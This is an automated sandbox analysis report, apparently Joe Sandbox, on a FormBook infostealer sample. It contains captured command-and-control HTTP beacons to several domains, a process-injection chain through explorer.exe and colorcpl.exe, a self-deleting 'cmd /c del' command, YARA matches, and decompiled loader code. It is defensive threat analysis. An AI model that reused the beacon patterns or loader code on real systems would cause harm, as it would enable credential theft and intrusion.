                                          Oct 13, 2021 16:44:14.906325102 CEST4123INData Raw: 34 64 34 64 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 20 70 61 64 64 69 6e 67 3a 20 31 35 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 32 70 78 7d 0d 0a 2e 6b 77
                                          Data Ascii: 4d4d;display:block; word-wrap: break-word; padding: 15px;border-radius: 12px}.kwd_bloack ul li a:hover{background-color:#0b8040;color: #fff}.sale-msg {background:#fff; color:#4b4b4b; text-align:center; font-size:14px; height:40px; width:
                                          Oct 13, 2021 16:44:14.906372070 CEST4125INData Raw: 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 74 6f 70 3a 20 75 6e 73 65 74 3b 20 74 72 61 6e 73 66 6f
                                          Data Ascii: 00%;margin-bottom: 10px;text-align: center;position: relative; top: unset; transform: none;} .msgright{width: 100%;text-align: center} .top-strip{margin-bottom: 40px} .logo-img-wrap{float:none;width:auto} .searchbox{margi
                                          Oct 13, 2021 16:44:15.011696100 CEST4126INData Raw: 6c 2e 70 72 69 76 61 63 79 20 6c 69 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 7d 0d 0a 20 20 20 20 75 6c 2e 70 72 69 76 61 63 79 20 6c 69 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 7d
                                          Data Ascii: l.privacy li{display: block;font-size: 12px} ul.privacy li a{font-size: 12px} .msgright .expMsg, .backorder, .msgright .expMsg a{font-size: 12px} .related-searches-custom{font-size: 14px} }</style><script language="JavaSc
                                          Oct 13, 2021 16:44:15.053379059 CEST4128INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 69 67 68 76 69 7a 70 65 6f 70 6c 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 64 65 73 69 67 6e 2f 75 6e 64 65 72 63 6f 6e 73 74 72 75 63 74 69 6f 6e 6e 6f 74 69 63 65 2e 70 68 70
                                          Data Ascii: <a href="http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.com" onClick="return popup(this, 'notes')"> Why am I seeing this 'Under Construction' page?</a></p> <div class="expMsg">
                                          Oct 13, 2021 16:44:15.053442001 CEST4129INData Raw: 50 65 6e 6e 79 20 53 74 6f 63 6b 73 27 29 3b 72 65 74 75 72 6e 20 74 72 75 65 3b 22 20 6f 6e 6d 6f 75 73 65 6f 75 74 3d 22 63 68 61 6e 67 65 53 74 61 74 75 73 28 27 27 29 3b 72 65 74 75 72 6e 20 74 72 75 65 3b 22 20 6f 6e 63 6c 69 63 6b 3d 22 69
                                          Data Ascii: Penny Stocks');return true;" onmouseout="changeStatus('');return true;" onclick="if(typeof(showPop) != 'undefined')showPop=0;return modifyKeywordClickURL(this, 'kwclk');;" title="Best Penny Stocks" id="dk1" name="dk1" >Best Penny Stocks</a></l
                                          Oct 13, 2021 16:44:15.053488970 CEST4130INData Raw: 6b 4c 55 35 65 55 6f 53 4f 4f 61 7a 6f 4a 49 64 4b 36 42 4c 4a 41 79 66 5a 6b 51 4e 59 50 6e 64 66 52 5a 74 56 53 38 70 6c 68 58 38 65 4d 4a 61 34 48 41 43 41 7a 25 32 42 52 71 55 74 5a 74 4d 4a 62 4e 46 54 35 6d 4a 43 57 74 6d 25 32 42 53 46 70
                                          Data Ascii: kLU5eUoSOOazoJIdK6BLJAyfZkQNYPndfRZtVS8plhX8eMJa4HACAz%2BRqUtZtMJbNFT5mJCWtm%2BSFpIbPfUD1TqWoTXOVk3MGMvYYlHRqjEicHoVZdKOvBE1U39Gop0KJnig%2Fj4Hq4d4MVkB%2Fg8YvGB38IM%2FYFcGZ9wa6cowEIeQKfhhUaZOMumNwRrS20OHLN6Y5jz9a8WKjCktkelNaD1MZVUNXIuzyVa9wE4rV


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.54979034.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 13, 2021 16:44:25.292716026 CEST5623OUTGET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.oddanimalsink.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:25.406374931 CEST5623INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Wed, 13 Oct 2021 14:44:25 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "615f9601-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.54979146.101.121.24480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 13, 2021 16:44:41.115659952 CEST5625OUTGET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.itskosi.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:41.303195953 CEST5625INHTTP/1.1 301 Moved Permanently
                                          cache-control: public, max-age=0, must-revalidate
                                          content-length: 45
                                          content-type: text/plain
                                          date: Wed, 13 Oct 2021 14:44:41 GMT
                                          age: 0
                                          location: https://www.itskosi.com/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo
                                          x-nf-request-id: 01FHX1SM1KDY80SN7YV2CH4TJD
                                          server: Netlify
                                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 73 6b 6f 73 69 2e 63 6f 6d 2f 75 39 78 6e 2f 0a
                                          Data Ascii: Redirecting to https://www.itskosi.com/u9xn/


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.54979374.208.236.13480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 13, 2021 16:44:46.515561104 CEST5635OUTGET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.crisisinterventionadvocates.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:46.664726973 CEST5635INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Content-Length: 626
                                          Connection: close
                                          Date: Wed, 13 Oct 2021 14:44:46 GMT
                                          Server: Apache
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.5497973.64.163.5080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 13, 2021 16:45:02.310893059 CEST5649OUTGET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.everythangbutwhite.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:45:02.328963041 CEST5650INHTTP/1.1 410 Gone
                                          Server: openresty
                                          Date: Wed, 13 Oct 2021 14:45:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 36 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 65 76 65 72 79 74 68 61 6e 67 62 75 74 77 68 69 74 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 32 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 65 76 65 72 79 74 68 61 6e 67 62 75 74 77 68 69 74 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 7<html>9 <head>56 <meta http-equiv='refresh' content='5; url=http://www.everythangbutwhite.com/' />a </head>9 <body>42 You are being redirected to http://www.everythangbutwhite.coma </body>8</html>0


                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: pago atrasado.exe PID: 4308 Parent PID: 6040

                                          General

                                          Start time:16:42:56
                                          Start date:13/10/2021
                                          Path:C:\Users\user\Desktop\pago atrasado.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase:0x400000
                                          File size:288183 bytes
                                          MD5 hash:F841C72B1C4CADC4C98903AD26A96A16
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: pago atrasado.exe PID: 2840 Parent PID: 4308

                                          General

                                          Start time:16:42:58
                                          Start date:13/10/2021
                                          Path:C:\Users\user\Desktop\pago atrasado.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase:0x400000
                                          File size:288183 bytes
                                          MD5 hash:F841C72B1C4CADC4C98903AD26A96A16
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: explorer.exe PID: 3472 Parent PID: 2840

                                          General

                                          Start time:16:43:02
                                          Start date:13/10/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff693d90000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: colorcpl.exe PID: 248 Parent PID: 3472

                                          General

                                          Start time:16:43:34
                                          Start date:13/10/2021
                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                          Imagebase:0xe0000
                                          File size:86528 bytes
                                          MD5 hash:746F3B5E7652EA0766BA10414D317981
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 4940 Parent PID: 248

                                          General

                                          Start time:16:43:38
                                          Start date:13/10/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase:0x150000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 5060 Parent PID: 4940

                                          General

                                          Start time:16:43:38
                                          Start date:13/10/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Analysis Process: pago atrasado.exe PID: 4308 Parent PID: 6040 pago atrasado.exeCOMMON

                                            Executed Functions

                                            Function 004030FB, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315stringfilecomCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F28(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116); // executed
								_t60 = E004030CA(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403511();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x423fd4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x423fec; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F28(5);
											_t119 = E00405F28(6);
											_t67 = E00405F28(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F28(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x423f5c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x423fec =  *0x423fec | 0xffffffff;
										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
										goto L37;
									}
									_t123 = E004056B6(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E004053E0(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\alfons\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\alfons\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053C3();
											} else {
												E00405346();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t127);
											}
											E00405B98(0x425000,  *(_t129 + 0x20));
											 *0x425400 = 0x41;
